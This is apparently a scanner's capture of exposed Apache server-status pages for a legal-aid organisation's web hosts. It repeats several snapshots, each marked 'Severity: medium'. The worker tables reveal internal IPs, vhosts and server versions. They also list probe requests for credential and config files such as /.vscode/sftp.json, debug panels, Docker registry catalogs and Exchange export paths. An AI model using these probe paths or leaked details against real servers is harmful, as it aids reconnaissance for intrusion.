SSReqConnChildSlotClientProtocolVHostRequest 0-53276761/15/45890K 1.24001.10.13831.32 70.132.4.89http/1.1short.alas.org:8080GET / HTTP/1.1 1-53276492/26/46845K 1.10002.10.31901.10 70.132.4.67http/1.1on.alas.org:8080GET /.DS_Store HTTP/1.1 2-53277372/5/45356K 0.59002.10.06810.66 70.132.4.67http/1.1on.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 3-53270581/39/42332K 4.10001.10.48751.79 70.132.4.95http/1.1short.alas.org:8080GET / HTTP/1.1 4-53274931/26/43079K 1.85001.00.33696.70 70.132.4.89http/1.1short.alas.org:8080GET /about HTTP/1.1 5-53276811/22/42351K 1.27001.10.13726.12 70.132.4.67http/1.1short.alas.org:8080GET / HTTP/1.1 6-53277451/2/39190W 0.00101.00.01749.01 70.132.4.67http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 7-53274941/21/38944K 1.5601252.30.13745.13 70.132.4.89http/1.1esign.alas.org:8080GET /server-status HTTP/1.1 8-53276821/15/34614W 0.68100.90.12718.97 70.132.4.67http/1.1survey.alas.org:8080GET / HTTP/1.1 9-53276651/24/32899K 1.73001.00.33586.80 70.132.4.89http/1.1on.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 10-53276661/24/32812W 1.25001.10.31595.51 70.132.4.95http/1.1esign.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 11-53277461/5/26107K 0.54001.10.01471.28 70.132.4.89http/1.1short.alas.org:8080GET / HTTP/1.1 12-53277552/16/24024K 1.18002.10.09453.74 70.132.4.67http/1.1on.alas.org:8080GET /v2/_catalog HTTP/1.1 13-53277560/7/20986W 0.10100.00.02343.18 70.132.4.67http/1.1elearning.alas.org:8080GET / HTTP/1.1 14-53277610/2/17648W 0.63000.00.00280.61 70.132.55.84http/1.1gwinnettfamilylawclinic.org:808POST /xmlrpc.php HTTP/1.1 15-53277660/7/16326W 0.12100.00.03332.51 70.132.4.67http/1.1intranet.alas.org:8080GET / HTTP/1.1 16-53277750/1/14470W 0.09100.00.00217.23 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 17-53277762/3/9600K 0.24002.20.01127.60 70.132.4.95http/1.1short.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 18-53277772/4/8552K 0.02002.50.01103.55 70.132.4.89http/1.1short.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 19-53277782/3/6503K 0.18002.20.01112.39 70.132.4.89http/1.1short.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 20-53277790/2/6757W 0.00100.00.01100.25 70.132.4.89http/1.1intranet.alas.org:8080GET / HTTP/1.1 21-53277801/2/5219K 0.0411101.10.08102.36 70.132.4.89http/1.1esign.alas.org:8080GET / HTTP/1.1 22-53277812/3/6940K 0.05002.50.2095.16 70.132.4.89http/1.1short.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 23-53277860/2/5061W 0.00100.00.00105.43 70.132.4.89http/1.1elearning.alas.org:8080GET / HTTP/1.1 24-53278150/1/5176_ 0.1202750.00.0058.55 130.176.137.155http/1.1elearning.alas.org:8080GET /mod/book/view.php?id=141 HTTP/1.1 25-53278160/1/2526_ 0.1802280.00.0152.70 130.176.137.155http/1.1elearning.alas.org:8080GET /login/signup.php HTTP/1.1 26-53273601/27/2863K 2.64001.01.3772.60 52.46.36.134http/1.1atlantalegalaid.org:8080GET /robots.txt HTTP/1.1 27-53278210/1/2313_ 0.0901120.00.0051.72 130.176.137.155http/1.1elearning.alas.org:8080GET /user/profile.php?id=109 HTTP/1.1 28-53278261/2/2219K 0.064645.80.0541.91 64.252.67.155http/1.1events.alas.org:8080GET /wp-content/plugins/revslider/public/assets/js/rbtools.min. 29-53278310/1/2081_ 0.00000.00.0048.91 15.158.5.85http/1.1on.alas.org:8080GET / HTTP/1.1 30-53278322/2/1950K 0.584782149.30.1531.63 64.252.67.193http/1.1events.alas.org:8080GET /wp-content/plugins/woocommerce/assets/js/frontend/json HTT 31-53278331/1/1821K 0.1343551.30.0029.38 15.158.5.85http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 32-53278340/1/1817_ 0.010260.00.0050.54 15.158.5.85http/1.1secure.alas.org:8080GET / HTTP/1.1 33-53278351/2/2895K 0.0202141.20.0055.69 70.132.4.89http/1.1esign.alas.org:8080GET / HTTP/1.1 34-53278362/2/1902K 0.584773149.30.1526.09 64.252.68.161http/1.1events.alas.org:8080GET /wp-content/plugins/woocommerce/assets/js/frontend/href HTT 35-53278371/2/1417K 0.00001.00.0023.34 70.132.4.95http/1.1secure.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 36-53278460/1/1609_ 0.000130.00.0138.86 64.252.67.155http/1.1events.alas.org:8080GET /wp-content/plugins/js_composer/assets/js/dist/js_composer_ 37-53278471/2/1938K 0.00001.10.0124.95 70.132.4.95http/1.1short.alas.org:8080GET /v2/_catalog HTTP/1.1 38-53278802/2/1388K 0.584752149.20.1521.56 64.252.67.218http/1.1events.alas.org:8080GET /wp-content/plugins/revslider/public/assets/js/deeplink HTT 39-53278810/1/1459_ 0.010350.00.0823.63 64.252.68.175http/1.1events.alas.org:8080GET /wp-content/plugins/revslider/public/assets/js/rs6.min.js H 40-53278820/1/1374_ 0.00010.00.0118.01 64.252.68.161http/1.1events.alas.org:8080GET /wp-content/plugins/js_composer/assets/lib/bower/skrollr/di 41-53279120/0/550W 0.00400.00.0011.24 130.176.137.155http/1.1intranet.alas.org:8080GET /wp-admin/upload.php?mode=list HTTP/1.1 42-53279134/19/529K 0.01004.30.108.99 70.132.4.67http/1.1on.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 43-53279180/0/727W 1.13400.00.009.01 70.132.4.67http/1.1intranet.alas.org:8080GET / HTTP/1.1 44-53279230/0/645W 0.00400.00.006.60 70.132.4.67http/1.1intranet.alas.org:8080GET / HTTP/1.1 45-53279241/1/861K 0.55038811.00.0014.10 70.132.4.67http/1.1intranet.alas.org:8080GET / HTTP/1.1 46-53279252/3/534W 0.03103.40.047.09 70.132.4.67http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 47-53279264/6/490K 0.02005.50.036.20 70.132.4.67http/1.1short.alas.org:8080GET /v2/_catalog HTTP/1.1 48-53279271/1/508K 0.56041411.00.007.33 70.132.4.67http/1.1intranet.alas.org:8080GET / HTTP/1.1 49-53279284/4/365K 0.15004.40.004.74 70.132.4.67http/1.1on.alas.org:8080GET /_all_dbs HTTP/1.1 50-53279293/3/633W 0.00103.30.009.84 70.132.4.67http/1.1survey.alas.org:8080GET / HTTP/1.1 51-53279303/3/498W 0.03003.40.007.45 70.132.4.67http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 52-53279314/4/471K 0.00004.20.005.97 70.132.4.67http/1.1short.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 53-53279401/1/389K
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b0219af9a02c
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Tuesday, 13-Jun-2023 23:38:10 UTC Restart Time: Friday, 21-Apr-2023 15:43:58 UTC Parent Server Config. Generation: 54 Parent Server MPM Generation: 53 Server uptime: 53 days 7 hours 54 minutes 11 seconds Server load: 6.10 1.28 0.41 Total accesses: 671701 - Total Traffic: 11.7 GB CPU Usage: u163.13 s17.3 cu0 cs0 - .00392% CPU load .146 requests/sec - 2729 B/second - 18.3 kB/request 128 requests currently being processed, 9 idle workers KKKKKKWKWKWKKWWWWKKKWKKW__K___KC_KKK_KK__WKWWKWKKKWWKKWKKWKWWKWK WWWWKWWKWKWKKWWWWKWWKKWKWWKWWKWWKKWKKKKKKWWKKKKKKKKKKKWKWWKKWWWK WKKWWWWKW............. Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-53276761/15/45890K 1.24001.10.13831.32 70.132.4.89http/1.1short.alas.org:8080GET / HTTP/1.1 1-53276492/26/46845K 1.10002.10.31901.10 70.132.4.67http/1.1on.alas.org:8080GET /.DS_Store HTTP/1.1 2-53277372/5/45356K 0.59002.10.06810.66 70.132.4.67http/1.1on.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 3-53270581/39/42332K 4.10001.10.48751.79 70.132.4.95http/1.1short.alas.org:8080GET / HTTP/1.1 4-53274931/26/43079K 1.85001.00.33696.70 70.132.4.89http/1.1short.alas.org:8080GET /about HTTP/1.1 5-53276811/22/42351K 1.27001.10.13726.12 70.132.4.67http/1.1short.alas.org:8080GET / HTTP/1.1 6-53277451/2/39190W 0.00101.00.01749.01 70.132.4.67http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 7-53274941/21/38944K 1.5601252.30.13745.13 70.132.4.89http/1.1esign.alas.org:8080GET /server-status HTTP/1.1 8-53276821/15/34614W 0.68100.90.12718.97 70.132.4.67http/1.1survey.alas.org:8080GET / HTTP/1.1 9-53276651/24/32899K 1.73001.00.33586.80 70.132.4.89http/1.1on.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 10-53276661/24/32812W 1.25001.10.31595.51 70.132.4.95http/1.1esign.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 11-53277461/5/26107K 0.54001.10.01471.28 70.132.4.89http/1.1short.alas.org:8080GET / HTTP/1.1 12-53277552/16/24024K 1.18002.10.09453.74 70.132.4.67http/1.1on.alas.org:8080GET /v2/_catalog HTTP/1.1 13-53277560/7/20986W 0.10100.00.02343.18 70.132.4.67http/1.1elearning.alas.org:8080GET / HTTP/1.1 14-53277610/2/17648W 0.63000.00.00280.61 70.132.55.84http/1.1gwinnettfamilylawclinic.org:808POST /xmlrpc.php HTTP/1.1 15-53277660/7/16326W 0.12100.00.03332.51 70.132.4.67http/1.1intranet.alas.org:8080GET / HTTP/1.1 16-53277750/1/14470W 0.09100.00.00217.23 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 17-53277762/3/9600K 0.24002.20.01127.60 70.132.4.95http/1.1short.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 18-53277772/4/8552K 0.02002.50.01103.55 70.132.4.89http/1.1short.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 19-53277782/3/6503K 0.18002.20.01112.39 70.132.4.89http/1.1short.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 20-53277790/2/6757W 0.00100.00.01100.25 70.132.4.89http/1.1intranet.alas.org:8080GET / HTTP/1.1 21-53277801/2/5219K 0.0411101.10.08102.36 70.132.4.89http/1.1esign.alas.org:8080GET / HTTP/1.1 22-53277812/3/6940K 0.05002.50.2095.16 70.132.4.89http/1.1short.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 23-53277860/2/5061W 0.00100.00.00105.43 70.132.4.89http/1.1elearning.alas.org:8080GET / HTTP/1.1 24-53278150/1/5176_ 0.1202750.00.0058.55 130.176.137.155http/1.1elearning.alas.org:8080GET /mod/book/view.php?id=141 HTTP/1.1 25-53278160/1/2526_ 0.1802280.00.0152.70 130.176.137.155http/1.1elearning.alas.org:8080GET /login/signup.php HTTP/1.1 26-53273601/27/2863K 2.64001.01.3772.60 52.46.36.134http/1.1atlantalegalaid.org:8080GET /robots.txt HTTP/1.1 27-53278210/1/2313_ 0.0901120.00.0051.72 130.176.137.155http/1.1elearning.alas.org:8080GET /user/profile.php?id=109 HTTP/1.1 28-53278260/2/2219_ 0.06060.00.0541.91 64.252.67.155http/1.1events.alas.org:8080GET /wp-content/plugins/revslider/public/assets/js/rbtools.min. 29-53278310/1/2081_ 0.00000.00.0048.91 15.158.5.85http/1.1on.alas.org:8080GET / HTTP/1.1 30-53278322/2/1950K 0.584782149.30.1531.63 64.252.67.193http/1.1events.alas.org:8080GET /wp-content/plugins/woocommerce/assets/js/frontend/json HTT 31-53278331/1/1821C 0.1353551.30.0029.38 15.158.5.85http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 32-53278340/1/1817_ 0.010260.00.0050.54 15.158.5.85http/1.1secure.alas.org:8080GET / HTTP/1.1 33-53278351/2/2895K 0.0202141.20.0055.69 70.132.4.89http/1.1esign.alas.org:8080GET / HTTP/1.1 34-53278362/2/1902K 0.584773149.30.1526.09 64.252.68.161http/1.1events.alas.org:8080GET /wp-content/plugins/woocommerce/assets/js/frontend/href HTT 35-53278371/2/1417K 0.00001.00.0023.34 70.132.4.95http/1.1secure.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 36-53278460/1/1609_ 0.000130.00.0138.86 64.252.67.155http/1.1events.alas.org:8080GET /wp-content/plugins/js_composer/assets/js/dist/js_composer_ 37-53278471/2/1938K 0.00001.10.0124.95 70.132.4.95http/1.1short.alas.org:8080GET /v2/_catalog HTTP/1.1 38-53278802/2/1388K 0.584752149.20.1521.56 64.252.67.218http/1.1events.alas.org:8080GET /wp-content/plugins/revslider/public/assets/js/deeplink HTT 39-53278810/1/1459_ 0.010350.00.0823.63 64.252.68.175http/1.1events.alas.org:8080GET /wp-content/plugins/revslider/public/assets/js/rs6.min.js H 40-53278820/1/1374_ 0.00010.00.0118.01 64.252.68.161http/1.1events.alas.org:8080GET /wp-content/plugins/js_composer/assets/lib/bower/skrollr/di 41-53279120/0/550W 0.00400.00.0011.24 130.176.137.155http/1.1intranet.alas.org:8080GET /wp-admin/upload.php?mode=list HTTP/1.1 42-53279134/19/529K 0.01004.30.108.99 70.132.4.67http/1.1on.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 43-53279180/0/727W 1.13400.00.009.01 70.132.4.67http/1.1intranet.alas.org:8080GET / HTTP/1.1 44-53279230/0/645W 0.00400.00.006.60 70.132.4.67http/1.1intranet.alas.org:8080GET / HTTP/1.1 45-53279241/1/861K 0.55038811.00.0014.10 70.132.4.67http/1.1intranet.alas.org:8080GET / HTTP/1.1 46-53279252/3/534W 0.03103.40.047.09 70.132.4.67http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 47-53279264/6/490K 0.02005.50.036.20 70.132.4.67http/1.1short.alas.org:8080GET /v2/_catalog HTTP/1.1 48-53279271/1/508K 0.56041411.00.007.33 70.132.4.67http/1.1intranet.alas.org:8080GET / HTTP/1.1 49-53279284/4/365K 0.15004.40.004.74 70.132.4.67http/1.1on.alas.org:8080GET /_all_dbs HTTP/1.1 50-53279293/3/633W 0.00103.30.009.84 70.132.4.67http/1.1survey.alas.org:8080GET / HTTP/1.1 51-53279303/3/498W 0.03003.40.007.45 70.132.4.67http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 52-53279314/4/471K 0.00004.20.005.97 70.132.4.67http/1.1short.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 53-53279401/1/389K
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b021cab9eaff
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Tuesday, 13-Jun-2023 23:38:10 UTC Restart Time: Friday, 21-Apr-2023 15:43:58 UTC Parent Server Config. Generation: 54 Parent Server MPM Generation: 53 Server uptime: 53 days 7 hours 54 minutes 11 seconds Server load: 6.10 1.28 0.41 Total accesses: 671709 - Total Traffic: 11.7 GB CPU Usage: u155.32 s16.6 cu0 cs0 - .00373% CPU load .146 requests/sec - 2729 B/second - 18.3 kB/request 127 requests currently being processed, 10 idle workers KKKWKKWKWKKKKWWWWKKKWKKW__K___K__KKK_KK__WKWWKWKKKWWKKWKKWKWWKWK WWKWKWWKWKWKKWWWKKWWKKWKWWKWWWWWKKKKKKKKKWWKKKKKKKKKWKKKWWKKWWWK WKKWWWWKW............. Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-53276762/16/45891K 1.24002.20.14831.32 70.132.4.89http/1.1on.alas.org:8080GET /_all_dbs HTTP/1.1 1-53276492/26/46845K 1.10002.10.31901.10 70.132.4.67http/1.1on.alas.org:8080GET /.DS_Store HTTP/1.1 2-53277372/5/45356K 0.59002.10.06810.66 70.132.4.67http/1.1on.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 3-53270581/39/42332W 4.10001.10.48751.79 70.132.4.95http/1.1short.alas.org:8080GET /server-status HTTP/1.1 4-53274931/26/43079K 1.85001.00.33696.70 70.132.4.89http/1.1short.alas.org:8080GET /about HTTP/1.1 5-53276812/23/42352K 1.27002.20.13726.12 70.132.4.67http/1.1secure.alas.org:8080GET /v2/_catalog HTTP/1.1 6-53277451/2/39190W 0.00101.00.01749.01 70.132.4.67http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 7-53274941/21/38944K 1.5601252.30.13745.13 70.132.4.89http/1.1esign.alas.org:8080GET /server-status HTTP/1.1 8-53276821/15/34614W 0.68100.90.12718.97 70.132.4.67http/1.1survey.alas.org:8080GET / HTTP/1.1 9-53276651/24/32899K 1.73001.00.33586.80 70.132.4.89http/1.1on.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 10-53276662/25/32813K 1.2701153.50.32595.51 70.132.4.95http/1.1esign.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 11-53277461/5/26107K 0.54001.10.01471.28 70.132.4.89http/1.1short.alas.org:8080GET / HTTP/1.1 12-53277552/16/24024K 1.18002.10.09453.74 70.132.4.67http/1.1on.alas.org:8080GET /v2/_catalog HTTP/1.1 13-53277560/7/20986W 0.10100.00.02343.18 70.132.4.67http/1.1elearning.alas.org:8080GET / HTTP/1.1 14-53277610/2/17648W 0.63000.00.00280.61 70.132.55.84http/1.1gwinnettfamilylawclinic.org:808POST /xmlrpc.php HTTP/1.1 15-53277660/7/16326W 0.12100.00.03332.51 70.132.4.67http/1.1intranet.alas.org:8080GET / HTTP/1.1 16-53277750/1/14470W 0.09100.00.00217.23 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 17-53277762/3/9600K 0.24002.20.01127.60 70.132.4.95http/1.1short.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 18-53277772/4/8552K 0.02002.50.01103.55 70.132.4.89http/1.1short.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 19-53277782/3/6503K 0.18002.20.01112.39 70.132.4.89http/1.1short.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 20-53277790/2/6757W 0.00100.00.01100.25 70.132.4.89http/1.1intranet.alas.org:8080GET / HTTP/1.1 21-53277801/2/5219K 0.0411101.10.08102.36 70.132.4.89http/1.1esign.alas.org:8080GET / HTTP/1.1 22-53277812/3/6940K 0.05002.50.2095.16 70.132.4.89http/1.1short.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 23-53277860/2/5061W 0.00100.00.00105.43 70.132.4.89http/1.1elearning.alas.org:8080GET / HTTP/1.1 24-53278150/1/5176_ 0.1202750.00.0058.55 130.176.137.155http/1.1elearning.alas.org:8080GET /mod/book/view.php?id=141 HTTP/1.1 25-53278160/1/2526_ 0.1802280.00.0152.70 130.176.137.155http/1.1elearning.alas.org:8080GET /login/signup.php HTTP/1.1 26-53273601/27/2863K 2.64001.01.3772.60 52.46.36.134http/1.1atlantalegalaid.org:8080GET /robots.txt HTTP/1.1 27-53278210/1/2313_ 0.0901120.00.0051.72 130.176.137.155http/1.1elearning.alas.org:8080GET /user/profile.php?id=109 HTTP/1.1 28-53278260/2/2219_ 0.06060.00.0541.91 64.252.67.155http/1.1events.alas.org:8080GET /wp-content/plugins/revslider/public/assets/js/rbtools.min. 29-53278310/1/2081_ 0.00000.00.0048.91 15.158.5.85http/1.1on.alas.org:8080GET / HTTP/1.1 30-53278322/2/1950K 0.584782149.30.1531.63 64.252.67.193http/1.1events.alas.org:8080GET /wp-content/plugins/woocommerce/assets/js/frontend/json HTT 31-53278330/1/1821_ 0.1303550.00.0029.38 15.158.5.85http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 32-53278340/1/1817_ 0.010260.00.0050.54 15.158.5.85http/1.1secure.alas.org:8080GET / HTTP/1.1 33-53278351/2/2895K 0.0202141.20.0055.69 70.132.4.89http/1.1esign.alas.org:8080GET / HTTP/1.1 34-53278362/2/1902K 0.584773149.30.1526.09 64.252.68.161http/1.1events.alas.org:8080GET /wp-content/plugins/woocommerce/assets/js/frontend/href HTT 35-53278371/2/1417K 0.00001.00.0023.34 70.132.4.95http/1.1secure.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 36-53278460/1/1609_ 0.000130.00.0138.86 64.252.67.155http/1.1events.alas.org:8080GET /wp-content/plugins/js_composer/assets/js/dist/js_composer_ 37-53278471/2/1938K 0.00001.10.0124.95 70.132.4.95http/1.1short.alas.org:8080GET /v2/_catalog HTTP/1.1 38-53278802/2/1388K 0.584752149.20.1521.56 64.252.67.218http/1.1events.alas.org:8080GET /wp-content/plugins/revslider/public/assets/js/deeplink HTT 39-53278810/1/1459_ 0.010350.00.0823.63 64.252.68.175http/1.1events.alas.org:8080GET /wp-content/plugins/revslider/public/assets/js/rs6.min.js H 40-53278820/1/1374_ 0.00010.00.0118.01 64.252.68.161http/1.1events.alas.org:8080GET /wp-content/plugins/js_composer/assets/lib/bower/skrollr/di 41-53279120/0/550W 0.00400.00.0011.24 130.176.137.155http/1.1intranet.alas.org:8080GET /wp-admin/upload.php?mode=list HTTP/1.1 42-53279134/19/529K 0.01004.30.108.99 70.132.4.67http/1.1on.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 43-53279180/0/727W 1.13400.00.009.01 70.132.4.67http/1.1intranet.alas.org:8080GET / HTTP/1.1 44-53279230/0/645W 0.00400.00.006.60 70.132.4.67http/1.1intranet.alas.org:8080GET / HTTP/1.1 45-53279241/1/861K 0.55038811.00.0014.10 70.132.4.67http/1.1intranet.alas.org:8080GET / HTTP/1.1 46-53279252/3/534W 0.03103.40.047.09 70.132.4.67http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 47-53279264/6/490K 0.02005.50.036.20 70.132.4.67http/1.1short.alas.org:8080GET /v2/_catalog HTTP/1.1 48-53279271/1/508K 0.56041411.00.007.33 70.132.4.67http/1.1intranet.alas.org:8080GET / HTTP/1.1 49-53279284/4/365K 0.15004.40.004.74 70.132.4.67http/1.1on.alas.org:8080GET /_all_dbs HTTP/1.1 50-53279293/3/633W 0.00103.30.009.84 70.132.4.67http/1.1survey.alas.org:8080GET / HTTP/1.1 51-53279303/3/498W 0.03003.40.007.45 70.132.4.67http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 52-53279314/4/471K 0.00004.20.005.97 70.132.4.67http/1.1short.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 53-53279401/1/38
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b021c0833d4b
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Tuesday, 13-Jun-2023 23:38:10 UTC Restart Time: Friday, 21-Apr-2023 15:43:58 UTC Parent Server Config. Generation: 54 Parent Server MPM Generation: 53 Server uptime: 53 days 7 hours 54 minutes 11 seconds Server load: 6.10 1.28 0.41 Total accesses: 671666 - Total Traffic: 11.7 GB CPU Usage: u173.97 s18.24 cu0 cs0 - .00417% CPU load .146 requests/sec - 2729 B/second - 18.3 kB/request 135 requests currently being processed, 2 idle workers KKKKKKWWWKKKKWWWWKKKWKKWKKKKKCKKCWKK_KKK_WKWWKWKWKWWKKWWWWKWWKWK WWKWKWWKWKWKKWWWKKWWKKKKWWKWWKWWKKWKKKKKKWWKWWWKKKKKKKWKWWKKWWWW KKKWWKWKW............. Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-53276761/15/45890K 1.24001.10.13831.32 70.132.4.89http/1.1short.alas.org:8080GET / HTTP/1.1 1-53276491/25/46844K 1.1011351.10.31901.09 70.132.4.67http/1.1esign.alas.org:8080GET / HTTP/1.1 2-53277372/5/45356K 0.59002.10.06810.66 70.132.4.67http/1.1on.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 3-53270581/39/42332K 4.10001.10.48751.79 70.132.4.95http/1.1short.alas.org:8080GET / HTTP/1.1 4-53274931/26/43079K 1.85001.00.33696.70 70.132.4.89http/1.1short.alas.org:8080GET /about HTTP/1.1 5-53276811/22/42351K 1.27001.10.13726.12 70.132.4.67http/1.1short.alas.org:8080GET / HTTP/1.1 6-53277451/2/39190W 0.00101.00.01749.01 70.132.4.67http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 7-53274940/20/38943W 1.54000.00.13745.12 70.132.4.89http/1.1esign.alas.org:8080GET /server-status HTTP/1.1 8-53276821/15/34614W 0.68100.90.12718.97 70.132.4.67http/1.1survey.alas.org:8080GET / HTTP/1.1 9-53276651/24/32899K 1.73001.00.33586.80 70.132.4.89http/1.1on.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 10-53276661/24/32812K 1.25001.10.31595.51 70.132.4.95http/1.1on.alas.org:8080GET / HTTP/1.1 11-53277461/5/26107K 0.54001.10.01471.28 70.132.4.89http/1.1short.alas.org:8080GET / HTTP/1.1 12-53277552/16/24024K 1.18002.10.09453.74 70.132.4.67http/1.1on.alas.org:8080GET /v2/_catalog HTTP/1.1 13-53277560/7/20986W 0.10100.00.02343.18 70.132.4.67http/1.1elearning.alas.org:8080GET / HTTP/1.1 14-53277610/2/17648W 0.63000.00.00280.61 70.132.55.84http/1.1gwinnettfamilylawclinic.org:808POST /xmlrpc.php HTTP/1.1 15-53277660/7/16326W 0.12100.00.03332.51 70.132.4.67http/1.1intranet.alas.org:8080GET / HTTP/1.1 16-53277750/1/14470W 0.09000.00.00217.23 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 17-53277761/2/9599K 0.24001.10.01127.60 70.132.4.95http/1.1on.alas.org:8080GET / HTTP/1.1 18-53277772/4/8552K 0.02002.50.01103.55 70.132.4.89http/1.1short.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 19-53277781/2/6502K 0.18001.10.01112.39 70.132.4.89http/1.1short.alas.org:8080GET / HTTP/1.1 20-53277790/2/6757W 0.00100.00.01100.25 70.132.4.89http/1.1intranet.alas.org:8080GET / HTTP/1.1 21-53277801/2/5219K 0.0401101.10.08102.36 70.132.4.89http/1.1esign.alas.org:8080GET / HTTP/1.1 22-53277811/2/6939K 0.050111.40.2095.16 70.132.4.89http/1.1secure.alas.org:8080GET / HTTP/1.1 23-53277860/2/5061W 0.00000.00.00105.43 70.132.4.89http/1.1elearning.alas.org:8080GET / HTTP/1.1 24-53278151/1/5176K 0.1242751.80.0058.55 130.176.137.155http/1.1elearning.alas.org:8080GET /mod/book/view.php?id=141 HTTP/1.1 25-53278161/1/2526K 0.18422813.90.0152.70 130.176.137.155http/1.1elearning.alas.org:8080GET /login/signup.php HTTP/1.1 26-53273601/27/2863K 2.64001.01.3772.60 52.46.36.134http/1.1atlantalegalaid.org:8080GET /robots.txt HTTP/1.1 27-53278211/1/2313K 0.0941121.80.0051.72 130.176.137.155http/1.1elearning.alas.org:8080GET /user/profile.php?id=109 HTTP/1.1 28-53278261/2/2219K 0.064645.80.0541.91 64.252.67.155http/1.1events.alas.org:8080GET /wp-content/plugins/revslider/public/assets/js/rbtools.min. 29-53278311/1/2081C 0.00501.40.0048.91 15.158.5.85http/1.1on.alas.org:8080GET / HTTP/1.1 30-53278322/2/1950K 0.584782149.30.1531.63 64.252.67.193http/1.1events.alas.org:8080GET /wp-content/plugins/woocommerce/assets/js/frontend/json HTT 31-53278331/1/1821K 0.1343551.30.0029.38 15.158.5.85http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 32-53278341/1/1817C 0.015261.70.0050.54 15.158.5.85http/1.1secure.alas.org:8080GET / HTTP/1.1 33-53278350/1/2894W 0.00000.00.0055.69 70.132.4.89http/1.1esign.alas.org:8080GET / HTTP/1.1 34-53278362/2/1902K 0.584773149.30.1526.09 64.252.68.161http/1.1events.alas.org:8080GET /wp-content/plugins/woocommerce/assets/js/frontend/href HTT 35-53278371/2/1417K 0.00001.00.0023.34 70.132.4.95http/1.1secure.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 36-53278460/1/1609_ 0.000130.00.0138.86 64.252.67.155http/1.1events.alas.org:8080GET /wp-content/plugins/js_composer/assets/js/dist/js_composer_ 37-53278471/2/1938K 0.00001.10.0124.95 70.132.4.95http/1.1short.alas.org:8080GET /v2/_catalog HTTP/1.1 38-53278802/2/1388K 0.584752149.20.1521.56 64.252.67.218http/1.1events.alas.org:8080GET /wp-content/plugins/revslider/public/assets/js/deeplink HTT 39-53278811/1/1459K 0.0143584.30.0823.63 64.252.68.175http/1.1events.alas.org:8080GET 